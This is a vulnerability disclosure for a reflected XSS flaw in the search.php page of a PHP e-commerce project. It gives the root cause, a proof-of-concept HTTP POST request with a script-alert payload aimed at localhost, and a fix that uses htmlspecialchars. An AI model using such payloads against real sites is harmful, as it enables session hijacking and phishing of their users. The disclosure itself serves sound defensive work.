code-projects E-commerce Site Project V1.0/search.php Reflected XSS Attack

[BalanceLee]

code-projects E-commerce Site Project V1.0/search.php Reflected XSS Attack

NAME OF AFFECTED PRODUCT(S)

• E-commerce Site

Vendor Homepage

• https://code-projects.org/e-commerce-site-in-php-with-source-code/

AFFECTED AND/OR FIXED VERSION(S)

submitter

• balancelee

Vulnerable File

• /search.php

VERSION(S)

• V1.0

Software Link

• https://code-projects.org/e-commerce-site-in-php-with-source-code/

PROBLEM TYPE

Vulnerability Type

• Reflected XSS

Root Cause

• The $_POST['keyword'] value is directly embedded in the HTML without applying any XSS protections such as htmlspecialchars().

Impact

• An attacker can execute arbitrary scripts, leading to:

  • Theft of user cookies (session hijacking)
  • Forged login or transactions
  • Phishing attacks by modifying page content
  • Unauthorized access to localStorage, sessionStorage, etc.

DESCRIPTION

• The vulnerability occurs in the search.php page, where user input from the keyword parameter is embedded directly into the HTML output without proper sanitization or encoding. This allows attackers to craft malicious JavaScript that executes in the victim’s browser, leading to cookie theft, session hijacking, phishing, and more.

Vulnerability details and POC

Vulnerability Name:

• Reflected XSS

POC Example：

---
POST /ecommerce/search.php HTTP/1.1
Host: localhost
Content-Length: 55
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/ecommerce/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=va04tdv24l43kfvceb3v1844h3
Connection: keep-alive

keyword=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
---

The following is the vulnerability exploitation process and the screenshot of the result：

<script>alert('XSS')</script>

Suggested repair

1. Perform HTML encoding on all user inputs:
   Example repair:

echo '<h1 class="page-header">No results found for <i>'.htmlspecialchars($_POST['keyword'], ENT_QUOTES, 'UTF-8').'</i></h1>';

2. Use WAF:
   Use a Web Application Firewall (WAF) to intercept typical XSS attacks.